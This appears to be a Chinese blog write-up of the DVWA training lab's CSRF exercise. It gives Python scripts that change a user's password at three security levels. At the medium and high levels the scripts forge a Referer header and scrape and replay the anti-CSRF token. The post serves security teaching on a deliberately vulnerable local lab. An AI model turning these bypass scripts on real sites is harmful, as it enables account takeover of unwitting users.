DVWA - CSRF (low, medium, high)
2017-01-06 14:12
435 查看
low
设置一下cookie的PHPSESSID和security即可跨站请求import requests def main(): url = 'http://192.168.67.22/dvwa/vulnerabilities/csrf/index.php' headers = { 'Cookie': 'PHPSESSID=88airjn39jqo5mi25fnngko6f0; security=low', } new_password = 'ac' url = '%s?password_new=%s&password_conf=%s&Change=Change' % (url, new_password, new_password) res = requests.get(url, headers=headers) if 'Password Changed.' in res.content: print('Yes') else: print('No') if __name__ == '__main__': main()
medium
查看源码,发现// Checks to see where the request came from if( eregi( $_SERVER[ 'SERVER_NAME' ], $_SERVER[ 'HTTP_REFERER' ] ) )
根据Referer验证请求来源,绕过思路:在HTTP请求头声明Referer。
import requests def main(): url = 'http://192.168.67.22/dvwa/vulnerabilities/csrf/index.php' headers = { 'Cookie': 'PHPSESSID=88airjn39jqo5mi25fnngko6f0; security=medium', 'Referer': 'http://192.168.67.22/dvwa/vulnerabilities/csrf/' } new_password = 'ac' url = '%s?password_new=%s&password_conf=%s&Change=Change' % (url, new_password, new_password) res = requests.get(url, headers=headers) if 'Password Changed.' in res.content: print('Yes') else: print('No') if __name__ == '__main__': main()
high
查看源码,发现多了动态user_token验证// Check Anti-CSRF token checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );
绕过思路:在代码层面发跨站请求动态获取user_token,再发跨站请求修改密码。
import requests import re def main(): url = 'http://192.168.67.22/dvwa/vulnerabilities/csrf/index.php' headers = { 'Cookie': 'PHPSESSID=88airjn39jqo5mi25fnngko6f0; security=high', 'Referer': 'http://192.168.67.22/dvwa/vulnerabilities/csrf/' } res = requests.get(url, headers=headers) m = re.search(r"user_token' value='(.*?)'", res.content, re.M | re.S) if m: user_token = m.group(1) new_password = 'ac' url = '%s?password_new=%s&password_conf=%s&user_token=%s&Change=Change' % (url, new_password, new_password, user_token) res = requests.get(url, headers=headers) if 'Password Changed.' in res.content: print('Yes') else: print('No') print(res.content) if __name__ == '__main__': main()
注:这3个实验要跨站,别一直都在本地同一个浏览器测试,这没意思。
相关文章推荐
- DVWA - File Upload (low, medium, high)
- DVWA - SQL Injection (low, medium, high)
- DVWA - XSS (Reflected) (low, medium, high)
- DVWA - XSS (Stored) (low, medium, high)
- DVWA - Brute Force (low, medium, high)
- DVWA - Command Injection (low, medium, high)
- DVWA - File Inclusion (low, medium, high)
- DVWA系列之24 high级别上传漏洞
- 【Usaco2015 dec】High Card Low Card
- 写一个函数DeleteRange删除单链表中结点的值在low 和high之间的结点
- DVWA-1.9系列操作之CSRF
- 详细解析rand()%(high-low+1)+low
- Codeforces Round #437 (Div. 2 E. Buy Low Sell High 先买后卖 贪心
- codeforces 867 E Buy Low Sell High(优先队列)
- DAY5 DVWA之SQL注入演练(low)
- System 提供的编译期函数(Dec,Inc,Odd,Pred,Succ,Ord,Chr,Low,High,Sizeof)
- 第五周项目3--输入一个数与0比较(LOW or HIGH)
- 第五周-3low or high
- NEON函数详解-----vld1_u16、vadd_u16、vst1_u16、vcombine_s32、vget_high_s32、vget_low_s32
- 写一个函数DeleteRange删除单链表中结点的值在low 和high之间的结点